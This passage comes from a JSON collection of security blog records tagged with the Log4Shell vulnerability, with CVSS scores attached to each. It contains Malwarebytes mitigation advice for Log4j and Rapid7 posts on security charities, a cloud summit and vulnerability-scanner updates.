by checking if the version of the platform they are using is affected. TechRepublic published _[a nifty guide](<https://www.techrepublic.com/article/how-to-test-if-your-linux-server-is-vulnerable-to-log4j/>)_ on just how to do that. \n\nSMB Windows users, on the other hand, should expect to be vulnerable as Microsoft uses Java-based apps in its products. The company has provided a lengthy guidance on the matter of Log4j _[here](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>)_, which it has regularly updated with observations on criminal movement involving the abuse of the Log4Shell flaw. It is essential to continuously return to that blog post for updates.\n\nOnce you have determined that your platform is impacted by Log4Shell, you must upgrade to the latest version of Apache Log4j, which is _[2.15.0](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>)_. If you\u2019re using versions between 2.10 and 2.14.1 but can\u2019t update to the newest version yet, RiskIQ _[advises](<https://community.riskiq.com/article/505098fc>)_ organizations to change the following JVM parameter value to "true" and restart the Java process:\n \n \n -DLog4j2.formatMsgNoLookups=true\n\n"Organizations who are unclear where to include this parameter must check the documentation of the related Java project/product in use for the correct place," the company further advises. "Alternatively, they may set the LOG4J_FORMAT_MSG_NO_LOOKUPS="true" environment variable to force this change. Kubernetes deployments may use this environment variable approach to set it across Kubernetes clusters, effectively reflecting on all pods and containers automatically."\n\nFinally, the Cybersecurity & Infrastructure Security Agency (CISA) encourages users and business administrators to visit the review this _[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)_ page to apply other recommended mitigations steps as soon as possible.\n\nThe post [What SMBs can do to protect against Log4Shell attacks](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T20:59:31", "type": "malwarebytes", "title": "What SMBs can do to protect against Log4Shell attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T20:59:31", "id": "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2021-12-14T10:37:12", "description": "Log4Shell., also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "trendmicroblog", "title": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "href": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-04T19:05:16", "description": "![5 Security Projects That Are Giving Back](https://blog.rapid7.com/content/images/2022/01/security-giving-back.jpg)\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nWhile it's always nice to receive gifts, the holiday season is more about giving \u2013 whether you're buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.\n\nGiving back is exactly what we'll be focusing on in today's [Hacky Holidays](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>) post, as it's a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we've highlighted a few security-related projects that exemplify the spirit of giving back.\n\n## 1\\. The Innocent Lives Foundation\n\n[The Innocent Lives Foundation](<https://www.innocentlivesfoundation.org/>) aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.\n\nThe Innocent Lives Foundation was first started by Chris Hadnagy, who [joined us on an episode of our Security Nation podcast](<https://www.rapid7.com/blog/post/2020/01/30/how-the-innocent-lives-foundation-uses-osint-to-uncover-predators/>) back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.\n\nThe foundation is serving endangered children and building a world in which all children can live innocent lives. It's difficult, emotionally taxing work, but it's making the world a better place, and it's the perfect example of giving back.\n\nIf you'd like to donate to the cause \u2014 it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed \u2014 you can do so [here](<https://www.innocentlivesfoundation.org/donate/>). Aside from donating, there are numerous other ways to [get involved](<https://www.innocentlivesfoundation.org/get-involved/>), including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.\n\n## 2\\. No More Ransom\n\nToday, ransomware is rampant. This fact won't surprise anyone working in the security industry, but many normal users around the world don't know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That's where [No More Ransom](<https://www.nomoreransom.org/en/index.html>) comes into play.\n\nNo More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands' police, Europol's European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.\n\nThe initiative aims to achieve this mission in two ways:\n\n 1. By compiling a [repository of keys and applications](<https://www.nomoreransom.org/en/decryption-tools.html>) that can decrypt data locked by different types of ransomware\n 2. By [spreading awareness about ransomware](<https://www.nomoreransom.org/en/ransomware-qa.html>) and educating the world about prevention methods they can employ in their daily lives\n\nWhile it's not always possible to regain access to files encrypted by or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.\n\nIn the 5 years of since its creation, the [No More Ransom initiative](<https://www.rapid7.com/blog/post/2021/07/26/decrypter-fomo-no-mo-five-years-of-the-no-more-ransom-project/>) has:\n\n * Built a library of 121 free tools\n * Been able to decrypt 151 ransomware families\n * Seen more than 6 million downloads of its tools\n * Prevented $900 million in criminal profit\n\nIf you'd like to do your part, the No More Ransom project is always looking for [new partners](<https://www.nomoreransom.org/en/partners.html>) to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also [report the crime](<https://www.nomoreransom.org/en/report-a-crime.html>), which will help identify new types of ransomware and aid future prevention.\n\n## 3\\. CIAS Gaming\n\nEstablished by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming \u2014 and as part of their work, they're making cybersecurity relatable, fun, and engaging for kids.\n\nThe [CIAS Gaming program](<https://cias.utsa.edu/gaming.php>) targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.\n\nCurrently, the CIAS K-12 Program consists of a few educational tools. These include:\n\n * A collectible card game and electronic download called [Cyber Threat Defender](<http://cias.utsa.edu/ctd_cards.php>)\n * A multiplayer card game for students in third through fifth grade called [Cyber Threat Protector](<https://cias.utsa.edu/protector.php>)\n * A card game for K-2 players with simple design and reinforced concepts called [Cyber Threat Guardian](<https://cias.utsa.edu/guardian.php>)\n * An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called [Project Cipher](<http://cias.utsa.edu/cipher.php>)\n * A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the [Pyramid of Knowledge](<http://cias.utsa.edu/pyramid.php>)\n * Interactive activities, like activity sheets and games, introduced to kids by the [CyBear cybersecurity mascots](<https://www.cultureofcybersecurity.com/>)\n\nCIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or [reach out](<https://cias.utsa.edu/contact.html>) directly to CIAS to learn more about taking part in their competitions or trainings.\n\n## 4\\. The Alliance for Securing Democracy\n\nThe [Alliance for Securing Democracy](<https://securingdemocracy.gmfus.org/>) (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.\n\nThe ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.\n\nThe ASD has conducted a significant amount of work in the area of [cybersecurity](<https://securingdemocracy.gmfus.org/cybersecurity/>). It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:\n\n * [The Authoritarian Interference Tracker](<https://securingdemocracy.gmfus.org/toolbox/authoritarian-interference-tracker/>), which exposes Russia and China's foreign interference activities\n * [The Information Operations Archive](<https://www.io-archive.org/>), which houses data points from known Information Operations\n * [The Hamilton 2.0 Dashboard](<https://securingdemocracy.gmfus.org/hamilton-dashboard/>), which reveals autocracies' state-backed messaging\n\nIn a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [info@securingdemocracy.org](<mailto:info@securingdemocracy.org>) or [donate to the cause](<https://contributions.gmfus.org/ASD-Donations>).\n\n## 5\\. Code for Social Good\n\n[Code for Social Good](<https://app.code4socialgood.org/>) is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It's all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.\n\nWhether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can [sign up](<https://c4sg.auth0.com/login?state=hKFo2SBKaXJWNm4tTWNhQmNTSl9ER2V3Q2h3eHJTRXRHdVpuWKFupWxvZ2luo3RpZNkgMGw5cTQ1OFhyVUhzZkhWa1M2X0hvT3ZsZTNjUFpHNjmjY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) as a volunteer, and then, you can browse their [list of projects](<https://app.code4socialgood.org/project/list/projects>). If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also [post projects](<https://c4sg.auth0.com/login?state=hKFo2SAxYndhbFFlWENNM3RmYXozb1U5RHhtaHgtSHNteWJlaaFupWxvZ2luo3RpZNkgNHlWZ1MyUGpMeDhRRGdKUzRhRTFGZXNadjktdTRsSTijY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) on the site and [find volunteers](<https://app.code4socialgood.org/user/list>) to assist them.\n\nAs of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they're always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.\n\nGiving back is an important theme of the holidays and one that's integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.\n\nIf you're looking for ways to give back, hopefully these examples inspire you to action. If you'd like to stay in the holiday spirit, check out the rest of our [Hacky Holidays](<https://www.rapid7.com/blog/tag/hacky-holidays-2021/>) specials.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T18:44:58", "type": "rapid7blog", "title": "5 Security Projects That Are Giving Back", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T18:44:58", "id": "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "href": "https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "![3 Reasons to Join Rapid7\u2019s Cloud Security Summit](https://blog.rapid7.com/content/images/2022/03/cloud-summit.jpg)\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peak at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team member\u2019s from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/insightvm-q1-22.jpg)\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. Our team also offers practical guidance to help the security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operative directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/screen_shot_2022-03-29_at_10.28.12_am.png)\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/screen_shot_2022-03-29_at_10.27.46_am.png)\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and inform prioritization decisions around remediation efforts. \n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image1-4.png)\n\n## \n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now, you now configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have the visibility into a wider range of deployment configurations of Oracle Database and the ability to configure scan using Service Name or SID.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image3-2.png)\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image2-3.png)\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. This update adds that extra capability to not only look at the version of Log4j that was present in your environment but also check if it has been mitigated \u2014 i.e., if the vulnerable code is removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. [Learn more about Rapid7 response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading: **_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_ \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": 